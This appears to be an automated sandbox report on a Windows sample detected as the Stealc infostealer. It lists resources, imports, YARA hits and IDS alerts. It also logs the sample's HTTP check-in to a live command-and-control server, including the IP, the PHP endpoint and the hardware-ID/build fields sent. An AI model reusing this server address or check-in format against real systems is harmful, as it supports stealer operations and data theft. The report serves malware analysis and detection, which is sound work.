RT_ICON	0xae8c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5368663594470046
RT_ICON	0xae8c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5368663594470046
RT_ICON	0xaef88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.408298755186722
RT_ICON	0xaef88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.408298755186722
RT_ICON	0xb1530	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.449468085106383
RT_ICON	0xb1530	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.449468085106383
RT_ICON	0xb19c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.36220682302771856
RT_ICON	0xb19c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.36220682302771856
RT_ICON	0xb2870	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.49954873646209386
RT_ICON	0xb2870	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.49954873646209386
RT_ICON	0xb3118	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.5777649769585254
RT_ICON	0xb3118	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.5777649769585254
RT_ICON	0xb37e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.6394508670520231
RT_ICON	0xb37e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.6394508670520231
RT_ICON	0xb3d48	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	India	0.44367219917012446
RT_ICON	0xb3d48	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	Sri Lanka	0.44367219917012446
RT_ICON	0xb62f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	India	0.4526266416510319
RT_ICON	0xb62f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	Sri Lanka	0.4526266416510319
RT_ICON	0xb7398	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	India	0.4413934426229508
RT_ICON	0xb7398	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	Sri Lanka	0.4413934426229508
RT_ICON	0xb7d20	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	India	0.49556737588652483
RT_ICON	0xb7d20	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	Sri Lanka	0.49556737588652483
RT_DIALOG	0xc1900	0x58	data			0.8977272727272727
RT_STRING	0xc1958	0x396	data	Tamil	India	0.4553376906318083
RT_STRING	0xc1958	0x396	data	Tamil	Sri Lanka	0.4553376906318083
RT_STRING	0xc1cf0	0x360	data	Tamil	India	0.4664351851851852
RT_STRING	0xc1cf0	0x360	data	Tamil	Sri Lanka	0.4664351851851852
RT_STRING	0xc2050	0x5fa	data	Tamil	India	0.43790849673202614
RT_STRING	0xc2050	0x5fa	data	Tamil	Sri Lanka	0.43790849673202614
RT_STRING	0xc2650	0x2f8	data	Tamil	India	0.4723684210526316
RT_STRING	0xc2650	0x2f8	data	Tamil	Sri Lanka	0.4723684210526316
RT_ACCELERATOR	0xbbd90	0x58	data	Tamil	India	0.7954545454545454
RT_ACCELERATOR	0xbbd90	0x58	data	Tamil	Sri Lanka	0.7954545454545454
RT_GROUP_CURSOR	0xbdaa0	0x30	data			0.9375
RT_GROUP_CURSOR	0xbdcb0	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0xbf990	0x30	data			0.9375
RT_GROUP_CURSOR	0xc1678	0x30	data			0.9375
RT_GROUP_ICON	0xb1998	0x30	data	Tamil	India	0.9375
RT_GROUP_ICON	0xb1998	0x30	data	Tamil	Sri Lanka	0.9375
RT_GROUP_ICON	0xb8188	0x76	data	Tamil	India	0.6694915254237288
RT_GROUP_ICON	0xb8188	0x76	data	Tamil	Sri Lanka	0.6694915254237288
RT_VERSION	0xc16a8	0x258	data			0.5383333333333333

Imports

DLL	Import
KERNEL32.dll	InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, CreateJobObjectW, WriteConsoleInputA, GetComputerNameW, GetTimeFormatA, CallNamedPipeW, FreeEnvironmentStringsA, GetTickCount, GetCommConfig, GetNumberFormatA, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsA, TlsSetValue, GetCurrencyFormatW, SetFileShortNameW, LoadLibraryW, ReadConsoleInputA, IsBadCodePtr, SetVolumeMountPointA, CreateProcessW, GetFileAttributesW, GetModuleFileNameW, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, GetDiskFreeSpaceW, LoadLibraryA, OpenJobObjectW, SetEnvironmentVariableA, GlobalWire, GlobalUnWire, GetCurrentDirectoryA, OpenEventW, GetShortPathNameW, SetFileAttributesW, GetVersionExW, GetTempFileNameW, HeapAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, TerminateProcess, IsDebuggerPresent, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
GDI32.dll	GetCharWidth32A
WINHTTP.dll	WinHttpOpen

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-29T04:56:59.964831+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	77.83.175.105	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 04:56:58.807454109 CET	49730	80	192.168.2.4	77.83.175.105
Oct 29, 2024 04:56:58.813025951 CET	80	49730	77.83.175.105	192.168.2.4
Oct 29, 2024 04:56:58.813117981 CET	49730	80	192.168.2.4	77.83.175.105
Oct 29, 2024 04:56:58.813502073 CET	49730	80	192.168.2.4	77.83.175.105
Oct 29, 2024 04:56:58.819067955 CET	80	49730	77.83.175.105	192.168.2.4
Oct 29, 2024 04:56:59.653760910 CET	80	49730	77.83.175.105	192.168.2.4
Oct 29, 2024 04:56:59.653846025 CET	49730	80	192.168.2.4	77.83.175.105
Oct 29, 2024 04:56:59.716830015 CET	49730	80	192.168.2.4	77.83.175.105
Oct 29, 2024 04:56:59.722368002 CET	80	49730	77.83.175.105	192.168.2.4
Oct 29, 2024 04:56:59.964745045 CET	80	49730	77.83.175.105	192.168.2.4
Oct 29, 2024 04:56:59.964831114 CET	49730	80	192.168.2.4	77.83.175.105
Oct 29, 2024 04:57:05.088120937 CET	80	49730	77.83.175.105	192.168.2.4
Oct 29, 2024 04:57:05.088200092 CET	49730	80	192.168.2.4	77.83.175.105
Oct 29, 2024 04:57:24.293833017 CET	49730	80	192.168.2.4	77.83.175.105

HTTP Request Dependency Graph

77.83.175.105

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	77.83.175.105	80	6720	C:\Users\user\Desktop\8WOUWb5iEv.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 04:56:58.813502073 CET	88	OUT	GET / HTTP/1.1 Host: 77.83.175.105 Connection: Keep-Alive Cache-Control: no-cache
Oct 29, 2024 04:56:59.653760910 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 03:56:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 29, 2024 04:56:59.716830015 CET	417	OUT	POST /18a9a962225b1ffb.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJ Host: 77.83.175.105 Content-Length: 217 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 38 31 41 36 42 35 46 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="hwid"8A81A6B5F3762778904926------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="build"LogsDiller------IDHDGIEHJJJJEBGDAFHJ--
Oct 29, 2024 04:56:59.964745045 CET	210	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 03:56:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Target ID:	0
Start time:	23:56:56
Start date:	28/10/2024
Path:	C:\Users\user\Desktop\8WOUWb5iEv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8WOUWb5iEv.exe"
Imagebase:	0x400000
File size:	712'192 bytes
MD5 hash:	DBFB5A1FEE1DF3D86B1CDBA9E338B31D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:56:59
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1052
Imagebase:	0x60000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	68.7%
Signature Coverage:	14%
Total number of Nodes:	1365
Total number of Limit Nodes:	26

Executed Functions

Function 00419F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00A65200), ref: 00419F3D
GetProcAddress.KERNEL32(74DD0000,00A654A0), ref: 00419F55
GetProcAddress.KERNEL32(74DD0000,00A6C650), ref: 00419F6E
GetProcAddress.KERNEL32(74DD0000,00A6C680), ref: 00419F86
GetProcAddress.KERNEL32(74DD0000,00A6C698), ref: 00419F9E
GetProcAddress.KERNEL32(74DD0000,00A6C638), ref: 00419FB7
GetProcAddress.KERNEL32(74DD0000,00A69840), ref: 00419FCF
GetProcAddress.KERNEL32(74DD0000,00A6C608), ref: 00419FE7
GetProcAddress.KERNEL32(74DD0000,00A6C6C8), ref: 0041A000
GetProcAddress.KERNEL32(74DD0000,00A6C6B0), ref: 0041A018
GetProcAddress.KERNEL32(74DD0000,00A6C620), ref: 0041A030
GetProcAddress.KERNEL32(74DD0000,00A654E0), ref: 0041A049
GetProcAddress.KERNEL32(74DD0000,00A651A0), ref: 0041A061
GetProcAddress.KERNEL32(74DD0000,00A651C0), ref: 0041A079
GetProcAddress.KERNEL32(74DD0000,00A65540), ref: 0041A092
GetProcAddress.KERNEL32(74DD0000,00A70670), ref: 0041A0AA
GetProcAddress.KERNEL32(74DD0000,00A70538), ref: 0041A0C2
GetProcAddress.KERNEL32(74DD0000,00A698B8), ref: 0041A0DB
GetProcAddress.KERNEL32(74DD0000,00A651E0), ref: 0041A0F3
GetProcAddress.KERNEL32(74DD0000,00A70658), ref: 0041A10B
GetProcAddress.KERNEL32(74DD0000,00A70700), ref: 0041A124
GetProcAddress.KERNEL32(74DD0000,00A70550), ref: 0041A13C
GetProcAddress.KERNEL32(74DD0000,00A70640), ref: 0041A154
GetProcAddress.KERNEL32(74DD0000,00A65240), ref: 0041A16D
GetProcAddress.KERNEL32(74DD0000,00A70508), ref: 0041A185
GetProcAddress.KERNEL32(74DD0000,00A705F8), ref: 0041A19D
GetProcAddress.KERNEL32(74DD0000,00A70778), ref: 0041A1B6
GetProcAddress.KERNEL32(74DD0000,00A70790), ref: 0041A1CE
GetProcAddress.KERNEL32(74DD0000,00A70580), ref: 0041A1E6
GetProcAddress.KERNEL32(74DD0000,00A706E8), ref: 0041A1FF
GetProcAddress.KERNEL32(74DD0000,00A70718), ref: 0041A217
GetProcAddress.KERNEL32(74DD0000,00A705E0), ref: 0041A22F
GetProcAddress.KERNEL32(74DD0000,00A706B8), ref: 0041A248
GetProcAddress.KERNEL32(74DD0000,00A694C0), ref: 0041A260
GetProcAddress.KERNEL32(74DD0000,00A70730), ref: 0041A278
GetProcAddress.KERNEL32(74DD0000,00A70628), ref: 0041A291
GetProcAddress.KERNEL32(74DD0000,00A65260), ref: 0041A2A9
GetProcAddress.KERNEL32(74DD0000,00A704C0), ref: 0041A2C1
GetProcAddress.KERNEL32(74DD0000,00A65280), ref: 0041A2DA
GetProcAddress.KERNEL32(74DD0000,00A707A8), ref: 0041A2F2
GetProcAddress.KERNEL32(74DD0000,00A70520), ref: 0041A30A
GetProcAddress.KERNEL32(74DD0000,00A652C0), ref: 0041A323
GetProcAddress.KERNEL32(74DD0000,00A652A0), ref: 0041A33B
LoadLibraryA.KERNEL32(00A704D8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
LoadLibraryA.KERNEL32(00A70688,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
LoadLibraryA.KERNEL32(00A704F0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
LoadLibraryA.KERNEL32(00A70568,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
LoadLibraryA.KERNEL32(00A70748,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
LoadLibraryA.KERNEL32(00A705B0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
LoadLibraryA.KERNEL32(00A70760,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
LoadLibraryA.KERNEL32(00A70598,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
GetProcAddress.KERNEL32(75290000,00A652E0), ref: 0041A3EA
GetProcAddress.KERNEL32(75290000,00A705C8), ref: 0041A402
GetProcAddress.KERNEL32(75290000,00A6DD00), ref: 0041A41A
GetProcAddress.KERNEL32(75290000,00A70610), ref: 0041A433
GetProcAddress.KERNEL32(75290000,00A65600), ref: 0041A44B
GetProcAddress.KERNEL32(73440000,00A698E0), ref: 0041A470
GetProcAddress.KERNEL32(73440000,00A657E0), ref: 0041A489
GetProcAddress.KERNEL32(73440000,00A69700), ref: 0041A4A1
GetProcAddress.KERNEL32(73440000,00A706A0), ref: 0041A4B9
GetProcAddress.KERNEL32(73440000,00A706D0), ref: 0041A4D2
GetProcAddress.KERNEL32(73440000,00A65620), ref: 0041A4EA
GetProcAddress.KERNEL32(73440000,00A65640), ref: 0041A502
GetProcAddress.KERNEL32(73440000,00A707C0), ref: 0041A51B
GetProcAddress.KERNEL32(752C0000,00A658C0), ref: 0041A53C
GetProcAddress.KERNEL32(752C0000,00A656A0), ref: 0041A554
GetProcAddress.KERNEL32(752C0000,00A707F0), ref: 0041A56D
GetProcAddress.KERNEL32(752C0000,00A70838), ref: 0041A585
GetProcAddress.KERNEL32(752C0000,00A655C0), ref: 0041A59D
GetProcAddress.KERNEL32(74EC0000,00A69750), ref: 0041A5C3
GetProcAddress.KERNEL32(74EC0000,00A69958), ref: 0041A5DB
GetProcAddress.KERNEL32(74EC0000,00A70808), ref: 0041A5F3
GetProcAddress.KERNEL32(74EC0000,00A65800), ref: 0041A60C
GetProcAddress.KERNEL32(74EC0000,00A65820), ref: 0041A624
GetProcAddress.KERNEL32(74EC0000,00A69980), ref: 0041A63C
GetProcAddress.KERNEL32(75BD0000,00A70868), ref: 0041A662
GetProcAddress.KERNEL32(75BD0000,00A65760), ref: 0041A67A
GetProcAddress.KERNEL32(75BD0000,00A6DC00), ref: 0041A692
GetProcAddress.KERNEL32(75BD0000,00A70850), ref: 0041A6AB
GetProcAddress.KERNEL32(75BD0000,00A70880), ref: 0041A6C3
GetProcAddress.KERNEL32(75BD0000,00A656E0), ref: 0041A6DB
GetProcAddress.KERNEL32(75BD0000,00A658E0), ref: 0041A6F4
GetProcAddress.KERNEL32(75BD0000,00A70820), ref: 0041A70C
GetProcAddress.KERNEL32(75BD0000,00A707D8), ref: 0041A724
GetProcAddress.KERNEL32(75A70000,00A65880), ref: 0041A746
GetProcAddress.KERNEL32(75A70000,00A70C58), ref: 0041A75E
GetProcAddress.KERNEL32(75A70000,00A70CA0), ref: 0041A776
GetProcAddress.KERNEL32(75A70000,00A70CE8), ref: 0041A78F
GetProcAddress.KERNEL32(75A70000,00A70CB8), ref: 0041A7A7
GetProcAddress.KERNEL32(75450000,00A658A0), ref: 0041A7C8
GetProcAddress.KERNEL32(75450000,00A65680), ref: 0041A7E1
GetProcAddress.KERNEL32(75DA0000,00A65660), ref: 0041A802
GetProcAddress.KERNEL32(75DA0000,00A70D78), ref: 0041A81A
GetProcAddress.KERNEL32(6F070000,00A65740), ref: 0041A840
GetProcAddress.KERNEL32(6F070000,00A657A0), ref: 0041A858
GetProcAddress.KERNEL32(6F070000,00A65900), ref: 0041A870
GetProcAddress.KERNEL32(6F070000,00A70C10), ref: 0041A889
GetProcAddress.KERNEL32(6F070000,00A65840), ref: 0041A8A1
GetProcAddress.KERNEL32(6F070000,00A65700), ref: 0041A8B9
GetProcAddress.KERNEL32(6F070000,00A65860), ref: 0041A8D2
GetProcAddress.KERNEL32(6F070000,00A65920), ref: 0041A8EA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A901
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A917
GetProcAddress.KERNEL32(75AF0000,00A70C88), ref: 0041A939
GetProcAddress.KERNEL32(75AF0000,00A6DC60), ref: 0041A951
GetProcAddress.KERNEL32(75AF0000,00A70BF8), ref: 0041A969
GetProcAddress.KERNEL32(75AF0000,00A70E20), ref: 0041A982
GetProcAddress.KERNEL32(75D90000,00A65720), ref: 0041A9A3
GetProcAddress.KERNEL32(6E3B0000,00A70E08), ref: 0041A9C4
GetProcAddress.KERNEL32(6E3B0000,00A65940), ref: 0041A9DD
GetProcAddress.KERNEL32(6E3B0000,00A70BC8), ref: 0041A9F5
GetProcAddress.KERNEL32(6E3B0000,00A70DF0), ref: 0041AA0D

Strings

InternetSetOptionA, xrefs: 0041A8F5
HttpQueryInfoA, xrefs: 0041A90C

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62

Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
strlen.MSVCRT ref: 00404740
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
